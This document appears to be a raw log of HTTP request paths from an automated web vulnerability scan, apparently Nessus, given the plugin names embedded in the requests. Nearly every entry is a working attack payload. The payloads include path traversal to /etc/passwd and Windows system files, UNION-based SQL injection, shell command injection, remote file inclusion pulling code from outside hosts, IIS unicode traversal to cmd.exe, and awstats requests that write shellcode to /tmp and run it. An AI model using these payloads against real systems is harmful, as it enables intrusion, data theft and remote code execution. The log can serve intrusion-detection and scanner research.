/scripts/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+28+30+00+00+00+00++>>ctdn /scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1284503405-- /scripts/cpshost.dll /scripts/sitemap.scr.php?globals[pth][classes]=http://cirt.net/rfiinc.txt? /zroo33l4.cgi? /file_passwd/ /servlet/webacc?user.html=../../../../../../../../../../../../../../../../../../etc/passwd\x00 /javascript/document.c /scripts/wsasp.dll/wservice=wsbroker1/webutil/ping.p /scripts/bpk_bsfe_4vq.php /help.php?q="ping\xa0-w\xa07000\xa0-n\xa01\xa01.2.3.4&rem\xa0 /phpmyadmin/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd /help.php?q="ping\x09-w\x099000\x09-n\x091\x091.2.3.4|rem\x09 /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908691&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /script_path/installation/index.php?mosconfig_absolute_path=http://192.168.202.118:8080/zz5thkvtmlgl?? /vwmg565s.kspx? /cgi-bin/search.cgi?..\..\..\..\..\..\windows\win.ini /javascript/tutorials.exe /nuh3zirz.php? /examples/jsp/cal/language.php?data_dir=/etc/passwd\x00 /b5xdqgz2.dll? /examples/jsp/num/store.php?crn=42'&action=show&show_products_mode=cat_click /en-us/account/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /cacti/sendcard.php?view=1&id='sendcard_sql.nasl /examples/jsp/checkbox/js/scripts.php?load=/etc/passwd\x00 /cgiscripts/ /examples/jsp/checkbox/index.php?gadget=glossary&action=viewterm&term= /starnet/addons/slideshow_full.php?album_name='936668697 /index.php?show=/etc/passwd /scripts/bveygnpo6hkw.shtml /u95h6ymu.php? /javascript/.passwd.csv /javascript/layout.exe /examples/jsp/error/remindpasswd /scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332010400,256728797 -- /javascript/document.ini /main.php?logout="ping\x0c-w\x0c9000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c /l4fz1dqw.asp? /phpmyadmin//%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd /scripts/?.jsp /rpxyx07v.do? /opinion.exe /javascript/node.exe /l4fz1dqw.do? /examples/jsp/jsp2/jspx/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\x00 /setcookie.php?u=../../../../../../../../../../etc/passwd\x00 /recordings/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331918976&lang_crm=../../vtigerservice.php\x00 /ewc3rz1l.html? /scripts/admin/index.php?act=login&username=' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus /javascript/weblogic.exe /ybz5rz7a.nsf? /examples/jsp/num/base_local_rules.php?dir= /top.php?stuff="del;q52915956&rem; /comments.php?scriptpath=http://192.168.202.118:8080/2aibfaczmac8?? /scripts/callboth.php?seq=654321&out=123456&in=1332009306@nessus\x0d\x0aasteridex_in_code_injection.nasl /examples/jsp/error/mlog.html?screen=/etc/passwd /en-us/h5sc3gxy.do? /oie504mr.html? /member/usercp_menu.php?script_folder=http://192.168.202.118:8080/zz5thkvtmlgl? /top.php?stuff="|ping,-w,9000,-n,1,4.3.2.1|rem, /openview5.exe?target=main&action=../../../../../../../../../..//winnt/win.ini /en-us/oie504mr.html? /help.php?q="&ping\x0c-w\x0c7000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c /rpc/..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\+/og /m2fpztty.exe? /? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+ver+>>ctdn /awstats/awstats.pl?migrate=|echo;/bin/echo -en "zj\0003x\0315\0200xp1\0322\0262\0377\0266\0377\0001\0320" >> /tmp/gjehhrjnrx0;echo|awstats214256.txt /en-us/s7qus4g3.asp? /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php&frm_user=q83452335&scr_height=&scr_width= /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+debughwgl /examples/jsp/error/survey.inc.php?path=/etc/passwd\x00 /x7pclv4s.cfm? /boot-scripts/ /oie504mr.idc? /fcgi-bin/echo2?foo= /jw64yq8u.cgi? /scripting/ / /login?user=** /en-us/account/phpnews/sendtofriend.php?mid='1' /examples/jsp/checkbox/wiki.php/ /scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331908730,1,1,1,1,1,1,1--&blogid=1 /cgi-915/c32web.exe/getimage?imagename=customeremail.txt\x00.pdf /0u75ldxq.dll? /components/com_mospray/scripts/admin.php?basedir=http://192.168.202.118:8080/2aibfaczmac8??&cmd=id /fa8p8lr8.idc? /phpmyadmin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904418',null,null,null,null -- /examples/jsp/cal/error.php?selected_theme= /gallery_script/ /examples/jsp/colors/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435 /y8pmygrp.do? /awstats/awstats.pl?migrate=|echo;/./tmp/gjehhrjnrx0 > /dev/null &;echo|awstats741931.txt /bn857frh.x? /cgis/ppdscgi.exe /main.php?stuff="&ver,>q13326619&rem, /abuso dell'hardware nell'attacco al kernel di linux/ /javascript/stock.exe /cgi-sys/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe /examples/jsp/checkbox/index.php?mod_id=2&kb_ask= /help_subscription/ /scripts/search.php?getdate=./templates/default/admin.tpl /ht8pn8uq.cfc? /cgi-local/pfdispaly.cgi?../../../../../../../../../../etc/passwd /boilerplate.asp?nfuse_currentfolder=/&nfuse_template=.../.../.../.../.../.../.../.../.../boot.ini /ht8pn8uq.fts? /en-us/dda2qr7j.mscgi? /top.php?stuff=';del q56884429 # /phpmyadmin/search/results.stm?indexname=>">&style=fancy&spage=60&query=folder name /javascript/audits.exe /n1afe1y6.do? /jujgxwav.cgi? /n1afe1y6.do? /scripts/pssdseehtgdp.php /javascript/performance.exe /0z575z74.php3? /en-us/account/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\x00 /help.php?q='&uname\x09>q78257168\x09# /examples/jsp/jsp2/jspx/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd /modules.php?name=classifieds&op=viewads&id_subcatg=75&id_catg= /javascript/nsf.exe /de3v2dd9.idc? /main.inc.php?pathtoscript=http://192.168.202.118:8080/ghl9il? /cgi-home/ion-p.exe?page=c:\winnt\repair\sam /examples/jsp/cal/wordtrans.php?command=show_desc&advanced=1";id; true " /help.php?q="&ver&rem\x0c /javascript/.passwd.yml /vhzmaia2.fts? /cgi-bin/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\x00 /fa8p8lr8.html? /main.php?logout="ver\x0b>q12574322&rem\x0b /scripts/index.php?id=s1_eihg6e1' /examples/jsp/jsp2/el/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\x00 /javascript/compat.exe /examples/jsp/sessions/search.pl?form=../../../../../../etc/passwd\x00 /bxnyrhmh.aspx? /cgi-perl/ion-p?page=../../../../../etc/passwd /copatranscript_20061102/ /main.php?logout="ping;-w;11000;-n;1;4.3.2.1|rem; /examples/servlets/servlet/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /main.php?logout="del;q97754931&rem; /if69ddo1.aspx? /cacti/webdist.cgi?distloc=;id /top.php?stuff="del\xa0q69465625&rem\xa0 /examples/jsp/sessions/index.php?album=../../../../../../../../../../etc/passwd\x00 /b4vng02k.cfc? /manager/newsdesk.cgi?t=../../../../../../etc/passwd /m5103snj.cfm? /examples/jsp/num/way-board/way-board.cgi?db=/etc/passwd\x00 /javascript/document.pem /en-us/oie504mr.mscgi? /htbin/fileseek.cgi?foot=;cat /etc/passwd&head= /top.php?stuff="ping\x0c-w\x0c7000\x0c-n\x0c1\x0c1.2.3.4|rem\x0c /uc3w3bdi.do? /copying/

/rpxyx07v.jspa? /index.php?id=egyb16sayu' /main.php?logout="ping\xa0-w\xa010000\xa0-n\xa01\xa04.3.2.1&rem\xa0 /examples/jsp/cal/cal_week.php?op=week&catview=999' /hjdzm96v.php3? /javascript/.htpasswd.sfish/''''"""" /javascript/jhtml.exe /miz4r5hz.idc? /.cfc /perl_scripts/ /help.php?q=";uname\x09>q32988845\x09# /en-us/account/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd /help.php?q="|ping\x0b-w\x0b9000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b /vimscriptlinks/ /javascript/binary.exe /main.php?logout="&del,q76194966&rem, /9o6g5vkn.exe? /.html /scripts/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd|| /everything's just wonderful/ /weq93ppb.nsf? /main.php?logout="&ping -w 11000 -n 1 1.2.3.4&rem /javascript/.passwd.temp /cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331919198 /examples/jsp/jsp2/jspx/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\x00 /scripts/piywzua5hwer.html /byrg33fw.php3? /\"> /cgi-bin/review.php?id=1&cat=&subcat="> /t578vqea.aspx? /en-us/.asp /help.php?q=&ver >q48647675&rem /en-us/dda2qr7j.jsp? /examples/jsp/jsp2/jspx/index.php?id='union/**/select/**/0,0,616656011,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /apavxugx.cfc? /scripts/calendar.php?month=' union select 1,1,'1331909175','calendarix_month_sql_injection.nasl',1 # /comments.php?scriptpath=http://192.168.202.96:8080/4dckqcc0acprbz?? /main.php?logout="\x0ddel\x09q59885581\x09# /webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd /examples/jsp/colors/admin/admin.php?sid=0' /scripts/vhost.php?action=logout&time=1331908669 /i2n4v4rl.kspx? /javascript/.history.exe /g3w7y7u5.php3? /0u75ldxq.idc? /$sitebase/redcell/phonehome_script.exe /phpmyadmin/1' /javascript/.htaccess/-->">'>'" /main.php?logout="ver\x0b>q22255946&rem\x0b /nmw0do67.asp? /help.php?q="uname >q96673282 # /javascript/tail.exe /help.php?q="rm q98145633&rem /examples/jsp/error/index.php?chemin=../../../../../../..//etc /javascript/adv.exe /manager/index.php?gadget=../../../../../../etc/passwd\x00&path=/etc /scripts/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://xxxxxxxxxx/ /j734qobz.mscgi? /javascript/webwork.exe /3j8echh0.fts? /examples/jsp/colors/install.php?newlang=../../cpg_error.log\x00 /scripts/boarddata/data/user.idx /redirection_scripts/ /main.php?frm_daynight=day&frm_passwd=q15634621&frm_referer=http%3a//192.168.26.202/main.php&frm_user=&scr_height=&scr_width= /u95h6ymu.jsp? /eesubscription/ /search.jsp?q=%" /nsn/..\web/fdir.bas /pxagj7n7.cfm? /manager/nessus"> /cgi-perl/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|' /bin/vssetcookie.exe /examples/servlets/servlet/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\x00 /ows-bin/gw5/gwweb.exe?help=bad-request /help.php?q='\x0arm q19373947 # /examples/jsp/sessions/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login //\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xaeetc/passwd /vmi8bb12.mscgi? /0z575z74.mscgi? /examples/servlets/servlet/port.php?proto=tcp' /main.php?stuff="rm q73888727&rem /examples/jsp/sessions/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd /scripts/index.php?id=b6q5w0grm_' /cgi-bin/../../../../../../../winnt/system32/ping.exe 127.0.0.1 /examples/jsp/error/index.php?include_files[]=&include_files[query_string]=/etc/passwd /cacti/index.php?id='union/**/select/**/0,0,1448356578,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /main.php?logout='&del\x09q79227952\x09# /cgi-bin/popup.php?include_path=/etc/passwd\x00 /mailman/options/yourlist?language=en&email=<script>alert('vulnerable')</script> /main.php?stuff=ver;>q27761754&rem; /cacti/c32web.exe/getimage?imagename=cart32.ini\x00.gif /examples/jsp/source.jsp?../../../../system/autoexec.ncf /g3w7y7u5.cfm? /cgi-bin/supporter/tupdate.php?groupid=change&sg=' /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+d0+8b+04+91+01+f0+89+45+f0+eb+06+43+3b+5d+f4+72+d4+89+ec+61+8b+44+24+d0+c2++>>esbq /rpc/..\xc1\x1c..\xc1\x1c..\xc1\x1c..\xc1\x1c..\xc1\x1c../winnt/system32/cmd.exe?/c+dir+c:\+/og /en-us/jnv890lt.exe? /phpmyadmin/documentation.html?phpmyadmin= /help.php?q="&ver\x0b>q16289629&rem\x0b /help.php?q="\x0duname # /g8nu2yy7.dll? /jscripts/ /moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;rm+/tmp/btnvlgnsgo" /help.php?q=&ver\xa0>q47388185&rem\xa0 /lsoix5h3.jspa? /9o6g5vkn.php? /javascript/agent.exe /phpmyadmin/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\x00 /readmore.php?config["sipssys"]=http://192.168.202.118:8080/2aibfaczmac8? /examples/jsp/cal/wa.exe?debug-show-version /examples/jsp/checkbox/search.pl?form=../../../../../../etc/passwd\x00 /help.php?q=del;q46895114&rem; /jujgxwav.idc? /includes/phpdig/includes/config.php?relative_script_path=http://192.168.202.118:8080/tzhfyzkbomspvm? /scripts_photomanager/ /vbscript/ /phpmyadmin/usrdetails.php?sgnuptype=csaleid /manager/kb.cgi?view='&lang=en /cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password\x00 /examples/jsp/sessions/commerce.cgi?page=../../../../../etc/passwd\x00index.html /en-us/account/c32web.exe/getimage?imagename=cart32.ini\x00.gif /examples/jsp/colors/smpwservicescgi.exe /forum1_professionnel.asp?n=1771&nn=100&page=/../../../../../../../../../../etc/passwd /admin/plog-admin-functions.php?config[basedir]=/etc/passwd\x00 /examples/jsp/cal/way-board/way-board.cgi?db=/etc/passwd\x00 /cgi-bin/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\x00 /en-us/account/?mod=read&id=../../../../../../../../../../../../../etc/passwd\x00 /javascript/nethome.exe /help.php?q="&ver\x0c>q73531956&rem\x0c /help.php?q=;sleep 7 # /script/menu/menuprincipal.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8? /cgi-bin/technote/main.cgi?board=free_board&command=down_load&filename=/../../../../../../../../../../etc/passwd /examples/jsp/error/index.php?search=&function=search /scripts/9pen4xzgztjn.php3 /edzaia0i.nsf? /javascript/h.exe /examples/jsp/cal/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_83ihjgrj]));die;/* /vhzmaia2.x? /3hlysl2x.pl? /ghswfouu.idc? /cgi.cgi/fileseek2.cgi?foot=;cat /etc/passwd&head= /examples/jsp/sessions/index.php?chemin=../../../../../../..//etc /weq93ppb.mscgi? /recordings/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\x00 /forum_professionnel.asp?n=/etc/passwd\x00|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'/'. /en-us/account/search.cgi?..\..\..\..\..\..\winnt\win.ini /scripts/core/editor.php?editor_insert_bottom=/etc/passwd /10-leavin' to l/ /j4rdyhw8.mscgi? /3j8echh0.idc? /scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331909420,1,1564569063-- /examples/jsp/sessions/styles.php?toroot=/etc/passwd\x00 /javascript/second.exe /javascript/member.exe /en-us/i686v90l.exe? /scripts/wsisa.dll/wservice=wsbroker1/webtools/oscommand.w /en-us/account/ion-p.exe?page=c:\\winnt\\win.ini /tocpracticeareadescriptions/ /examples/jsp/jsp2/el/index.cfm?fuseaction=category.display&category_id=' /main.php?logout=ver;>q21667624&rem; /javascript/screenshots.exe /c-scripts/ /search.jsp?q=%" /contactscript/ /help.php?q="rm\x0bq76374652&rem\x0b /static//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd /scriptpath/index.php?page=http://192.168.202.96:8080/frznctvhi0i5? /scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1331919215,154330261 -- /cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1332009308,4--&blog=1 /en-us/account/profil.php?id=1 /examples/jsp/security/protected/is_cgi_installed3_j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6116917755.old /rv98iwjp.x? /transcriptofte179248/ /scripts/index /? /main.php?stuff="&ping -w 7000 -n 1 1.2.3.4&rem /xlj7h65o.html? /webdist.cgi?distloc=;id /zqqemp6j.dll? /examples/jsp/sessions/wa.exe?debug-show-version /jsp-examples/jsp2/el/functions.jsp?foo= /awstats/awstats.pl?migrate=|echo;/bin/echo -en "\0367\0322\0041\03201\0311qqj\0042j\0007pq\0211\0343" >> /tmp/ysooqnjtxq0;echo|awstats291577.txt /lsoix5h3.cfc? /javascript/tar.gz.exe /javascript/pda.exe /nmw0do67.jsp? /7u1pb2xi.php? /scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 109024103-- /scriptpath/footers.php?tinybb_footers=http://192.168.202.118:8080/iroy1gvqrrqu? /scripts/index.php?src=1&_common=1&time=1332009308&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /help.php?q=ver&rem; /examples/jsp/cal/index.php?sensor_program= /scripts/samples/search/filesize.idq /top.php?stuff='\x0asleep 11 # /phpmyadmin/login.php?course="> /qb2xy9aw.php3? /examples/jsp/colors/index.php?configfile=../../../../../../../../../etc/passwd /opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.118:8080/moclyxlwqyfjnp?\x00 /javascript/var.exe /examples/jsp/num/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\x00 /cgi-bin/index.php?cid=' /scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.118:8080/moclyxlwqyfjnp? /script_path/config.inc.php?_path=http://192.168.202.96:8080/vir0v3xfc?? /main.php?logout="uname\x09>q74671245\x09# /hipkz026.cgi? /cgi-win/ppdscgi.exe /cacti/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html /javascript/beehive.exe /qhvu0pdg.cgi? /o35zot2r.html? /x7pclv4s.html? /examples/jsp/num/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd /examples/jsp/num/index.php?selskin=../inc/boxleft.inc\x00&xposbox[l][]=/etc/passwd\x00 /phpmyadmin/index.php?id='union/**/select/**/0,0,1358744507,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /examples/jsp/num/view_user.php?list=1&letter=&sort_by='select /cgi-local/query?mss=../config /javascript/access-log.exe /phpmyadmin/error.php?selected_theme= /de3v2dd9.mscgi? /subscriptions.rss / /bin/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|' /main.php?stuff="&rm q54323675&rem /py-smbpasswd/ /? /examples/jsp/colors/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00| /javascript/arch.exe /ydexw8by.html? /cacti/topic.php?tid='select /examples/jsp/error/index.php?show=../../../../../../../../../../../etc/passwd\x00 /w4996nr0.asp? /cgis/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00 /g3w7y7u5.htm? /scriptpath/footers.php?tinybb_footers=http://192.168.202.96:8080/whmch8ftkt7kv? /scripts/apgafvcxoeeh.html /examples/jsp/cal/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd /odzk29aa.cfc? /scripts/shop.plx/page=nessus394221529 /webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=&branch=head /rbec2ohx.pl? /examples/jsp/jsp2/jspx/index.php?op=default&date=200607' union select 1,1908404704,1,1,1,1,1,1,1,1--&blogid=1 /index.php?op=default&date=200607' union select 1,240520592,1,1,1,1,1,1,1,1--&blogid=1 /jackrabbit/search.jsp?q=%" /top.php?stuff=';uname # /fa8p8lr8.kspx? /main.php?stuff="ping,-w,9000,-n,1,1.2.3.4&rem, /miz4r5hz.fts? /examples/jsp/colors/protection.php?action=logout&siteurl=/etc/passwd /examples/jsp/error/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd| /recordings/admin/admin.php?sid=' /psynch/nph-psf.exe?css=http://192.168.202.96:8080/4dckqcc0acprbz? /yver8r9o.do? /javascript/page_1.exe /admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd|| /examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6.1 /examples/jsp/colors/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\x00 /l752x1ry.x? /5qnlm5z2.nsf? /iktok2bw.htm? / /javascript/tool.exe /servlet/contentserver?pagename= /examples/jsp/jsp2/el/store.cgi?startid=../../../../../../../../../etc/passwd\x00.html /zv8tv7h8.aspx? /examples/jsp/jsp2/jspx/search= /main.php?logout="rm\xa0q91628118&rem\xa0 /iv5vkgam.htm? /inc/download_center_lite.inc.php?script_root=http://192.168.202.118:8080/zz5thkvtmlgl? /jdx255ea.dll? /javascript/cert.exe /manager/topic.php?tid='select /main.php?stuff='\x0adel\x09q13973431\x09# /help.php?q="\x0auname # /accessplatform/auth/clientscripts/ /script/ident/disconnect.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz? /scripts/app_and_readme/navigator/index.php?page=http://192.168.202.118:8080/2aibfaczmac8? /l752x1ry.htm? /javascript/dll.exe /scripts/index.php?op=default&date=200607' union select 1,1409814507,1,1,1,1,1,1,1,1--&blogid=1 /examples/jsp/checkbox/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd /edv3mapy.php? /phpmyadmin/athenareg.php?pass= ;id /top.php?stuff=";rm q17551646 # /vjbrrppi.htm? /mpcgi/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd| /eclxssapp/ /module/forum/forum.php?fd=http://192.168.202.118:8080/2aibfaczmac8?='; /javascript/privacy.exe /javascript/webcart.exe /cgi-bin/fxm.exe /top.php?stuff="ping,-w,8000,-n,1,1.2.3.4|rem, /vmi8bb12.cgi? /help.php?q='&sleep\x099\x09# /addvip.php?msetstr["progsdir"]=http://192.168.202.118:8080/ghl9il? /\..\..\..\..\..\..\..\..\..\winnt\win.ini /main.php?stuff='\x0duname >q64854395 # /examples/jsp/jsp2/el/webadmin.php?show=/etc/passwd /main.php?logout="rm\x09q51755129&rem\x09 /u95h6ymu.pl? /d5a5renl.idc? /examples/jsp/error/feedsplitter.php?format=../../../../../../../../../../etc/passwd\x00&debug=1 /3hlysl2x.dll? /en-us/account/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html /nuh3zirz.pl? /javascript/graphics.exe /cgi-bin/cwmail.exe /javascript/procure.exe /java-script/ /scripts/phpping/index.php?pingto=www.nessus.org | dir /gascripts/ /gvx7m5ti.htm? /cgi-exe/a1stats/a1disp3.cgi?../../../../../../../etc/passwd /top.php?stuff="rm\xa0q29642432&rem\xa0 /help.php?q=/' /scgi-bin/vssetcookie.exe /top.php?stuff=;rm q28242581 # /cacti/forum.php?do=viewtopic&cat=1&topic=1&page=1?>ctdn /en-us/account/usrdetails.php?sgnuptype=csaleid /prescription_drugs/ /edzaia0i.dll? /javascript/servers.exe /8t9v8k7x.do? /manager/htmlscript?../../../../../../../../../etc/passwd /examples/servlets/servlet/secure.php?cfgprogdir=/etc/passwd\x00 /htbin/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd| /javascript/jp.exe /nuh3zirz.x? /vac1l5vm.pl? /ladies of the 80's_ladies of the 80'smp3/ /javascript/access.1.exe /viewnewspapers.asp?newspaperid=123456' /de3v2dd9.php? /m4kkjf8l.jspa? /examples/jsp/cal/review.php?id=1&cat=&subcat="> /j4drbkil.jsp? /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904226 /oie504mr.cfc? /cgi-bin/htsearch.cgi?words="> /main.php?stuff=';sleep\x099\x09# /main.php?logout="&rm;q21715323&rem; /help.php?q="ping\x0c-w\x0c9000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c /main.php?stuff='&rm\x09q84519525\x09# /moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;chmod+555+/tmp/fppatbfqdp;" /javascript/reversed.exe /phpmyadmin/admin/admin.php?sid=' /examples/jsp/jsp2/el/a1stats/a1disp3.cgi?/../../../../../../etc/passwd /main.php?stuff='\x0duname >q65565224 # /3m5knyc4.aspx? /main.php?stuff='\x0ddel\x09q27918964\x09# /cgi-bin/rot13sj.cgi?/etc/passwd /scripts/calendar.php?month=' union select 1,1,'1331908849','calendarix_month_sql_injection.nasl',1 # /en-us/account/_head.php?_zb_path=../../../../../../../../../../etc/passwd\x00 /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php%3flogout%3d1&frm_user=q66642634&scr_height=&scr_width= /xfkun1ku.htm? /examples/jsp/colors/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\x00 /scripts/login.php /scripts/includes/hnmain.inc.php3?config[incdir]=http://xxxxxxxxxx/ /scripts/event_view.php?eid=34 union select 688985287 /j4drbkil.aspx? /en-us/odzk29aa.exe? /help.php?q='&uname >q85582565 # /b1q8bywu.jsp? /111-scriptome/ /examples/jsp/jsp2/jspx/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd /_mem_bin/..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf../winnt/system32/cmd.exe?/c+dir+c:\+/og /en-us/33y9gcqq.dll? /n1afe1y6.cfm? /main.php?logout=;del q17429254 # /cgi-915/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|' /en-us/h5sc3gxy.html? /javascript/wsdl.exe /scripts/vote.cgi /zv8tv7h8.x? /search.jsp?q=%" /en-us/odzk29aa.aspx? /scripts/whois_raw.cgi?fqdn=\x0aid /5qnlm5z2.x? /phpmyadmin/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd /ao22ww7y.fts? /admin/config.php?display=did&rnavsort=description /examples/servlets/servlet/shared/help.php?page=../../../../../../../../../../etc/passwd\x00 /awstats/awstats.pl?migrate=|echo;/bin/echo -en "h\0300\0250\0312fh\0002\0000\0250\0312\0211\0340j\0020pr" >> /tmp/vsnlklmgzu0;echo|awstats748737.txt /examples/jsp/cal/view_user.php?list=1&letter=&sort_by='select /ecmascript/ /sys/code/box.inc.php?config["sipssys"]=http://192.168.202.96:8080/4dckqcc0acprbz? /vii-ppp-scripts/ /examples/jsp/num/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /help.php?q="ver >q98145633&rem /static//../../../../../../../../windows/win.ini\x00 /mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosconfig_absolute_path=http://cirt.net/rfiinc.txt? /examples/servlets/servlet/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- /main.php?stuff="ver;>q25586458&rem; /javascript/tiles.exe /scripts/2pwudii1mt22.cgi /examples/servlets/servlet/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl /jw64yq8u.php3? /index.php?op=default&date=200607' union select 1,793421908,1,1,1,1,1,1,1,1--&blogid=1 /en-us/account/index.php?src=1&_common=1&time=1331909414&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /main.php?stuff=|ping;-w;11000;-n;1;4.3.2.1|rem; /script-installation/ /cgi-local/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|' /examples/jsp/colors/index.php?id='union/**/select/**/0,0,1917618887,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /scripts/2pwudii1mt22.inc /script/ident/loginmodif.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm? /examples/jsp/colors/wordtrans.php?command=show_desc&advanced=1";id; true " /scripts/check-lom.php?etcdir=http://192.168.202.118:8080/tzhfyzkbomspvm? /examples/jsp/num/search.php?submit=true&search='); /javascript/records.exe /recordings/admin/admin.php?sid=0' /examples/jsp/colors/adlayer.php?layerstyle=../../../../../../../etc/passwd\x00 /jujgxwav.kspx? /cgi-bin/adodb/server.php?sql='adodb_sql_sql_injection.nasl /cacti/calendar_admin.pl?config=|cat /etc/passwd| /scripts/h3d1n9eaqxv3.shtml /help.php?q="\x0dsleep 8 # /cgi-win/cgi-test.exe /examples/jsp/jsp2/el/texis.exe/?-dump /phpmyadmin/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null-- /odzk29aa.fts? /javascript/ex.exe /help.php?q='\x0dsleep 7 # /rv98iwjp.jspa? /nyjgaorz.aspx? /drhcprxk.htpasswd /qb2xy9aw.html? /javascript/opendir.exe 